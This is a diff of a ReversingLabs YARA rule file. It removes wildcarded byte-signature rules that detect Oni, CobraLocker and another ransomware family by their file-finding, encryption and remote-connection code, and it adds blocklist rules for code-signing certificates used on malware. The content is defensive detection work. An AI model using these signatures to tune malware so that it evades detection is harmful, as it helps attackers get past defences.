-            ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 51 6A
-            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
-            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ??
-            51 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
-            ?? 69 45 ?? ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ??
-            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p5 = {
-            E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 88 4D ?? 33 D2 89 55
-            ?? 89 55 ?? 89 55 ?? 89 55 ?? 88 55 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 33 C9 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
-            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
-            ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 45 ?? 50 8D 4D ??
-            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
-            75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ??
-            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8B 4D
-            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B
-        }
-		$encrypt_files_p6 = {
-            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ??
-            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D
-            ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ??
-            ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 45
-            ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 95 ?? ??
-            ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 55 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
-            ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ??
-            89 45 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? E8
-            ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? EB ?? 8B 4D ?? 8B 51 ??
-            89 55 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? C7 45 ?? ?? ?? ??
-            ?? 8B 4D ?? 8B 51 ?? 89 55 ?? EB ?? 8B 45 ?? 8B 48 ?? 89 4D ?? 83 7D ?? ?? 0F 84 ??
-            ?? ?? ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ??
-            ?? ?? ?? 6B D1 ?? 8D 8C 15 ?? ?? ?? ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 83 C8 ?? E9 ?? ??
-            ?? ?? 8D 55 ?? 89 55 ?? 8D 45 ?? 50 8B 4D ?? 0F B6 51 ?? 52 E8
-        }
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
-            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
-            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
-            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
-            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
-            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
-            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
-        }
-		$find_files_p2 = {
-            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
-            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
-            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
-            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
-            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" and 1662616824 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e7cdf040-3fe2-55ed-8f66-702fb4455653"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11402-L11420"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "acdfce4dc25cbc9e9817453d5cf56c7d319bebdf7a039ea47412ec3b2f68cb02"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) and 1617062400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_ONI : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Oni ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9190aee2-1119-546e-82ca-a7aba44a9d7f"
-		date = "2025-06-08"
-		date = "2025-06-08"
-		modified = "2020-12-07"
+		id = "b3978831-57d6-5f25-a271-fa4f449d37b3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Oni.yara#L1-L82"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "685abf5a5edba5bae19faaf6521ce617370cdab1404fe84d846e82a60182dfff"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11422-L11440"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a5960f4c2ed768ccc5779d3754f51463c7b14a3a887c690944add23fba464f1a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8B D4 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02
-            ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 90 8A 01 41 84
-            C0 75 ?? 2B CE 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ??
-            ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ??
-            ?? ?? C7 41 ?? ?? ?? ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75
-            ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72
-            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9
-            ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 5B E8
-            ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 68
-            ?? ?? ?? ?? 6A ?? 33 F6 89 55 ?? 56 56 50 89 4D ?? 89 75 ?? FF D7 85 C0 75 ?? 68 ??
-            ?? ?? ?? 6A ?? 50 50 8D 45 ?? 50 FF D7 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8D 45 ??
-            89 75 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85
-            DB 74 ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? 53 57 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ??
-            8B 4D ?? 85 C9 74 ?? 8B 45 ?? 89 01 53 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ??
-            5B 8B 4D ?? 8B C6 5F 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$search_processes = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 44 24 ?? ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? C7 05 ??
-            ?? ?? ?? ?? ?? ?? ?? 50 8D 44 24 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 05 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 83 EE ?? 4F 83 7E
-            ?? ?? 72 ?? 8B 1E 8B CE 56 E8 ?? ?? ?? ?? 8B 46 ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C3 ??
-            75 ?? 8B 43 ?? 3B C3 73 ?? 2B D8 83 FB ?? 72 ?? 83 FB ?? 77 ?? 8B D8 53 E8 ?? ?? ??
-            ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ??
-            8B C6 8B CE C6 00 ?? E8 ?? ?? ?? ?? 85 FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 5F 5E 5B 8B E5 5D C3 E8 ?? ?? ?? ?? CC CC CC CC CC B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_processes ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and ( pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" or pe.signatures [ i ] . serial == "c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" ) and 1616371200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cobralocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CobraLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dada6370-3ae3-5931-ba9f-da56ebbcd8c8"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "f87dac0c-4b46-5b30-a715-f21e7c3a98e0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara#L1-L59"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "95f4c645c7c237d23b5028f824f78a5f9f8f0a4737b391d877582afe08264d7e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11442-L11458"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "78cbfeb5d7b58029a5b4107f2a59e892ff9d71788cf74e88ac823cb85ba35a94"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CobraLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ??
-            ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02
-            8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ??
-            38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ??
-            ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD
-            ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06
-            13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A
-        }
-		$find_files = {
-            16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17
-            28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ??
-            00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
-            FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ??
-            ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ??
-            ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11
-            ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ??
-            6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ??
-            16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ??
-            ?? ?? 3A ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
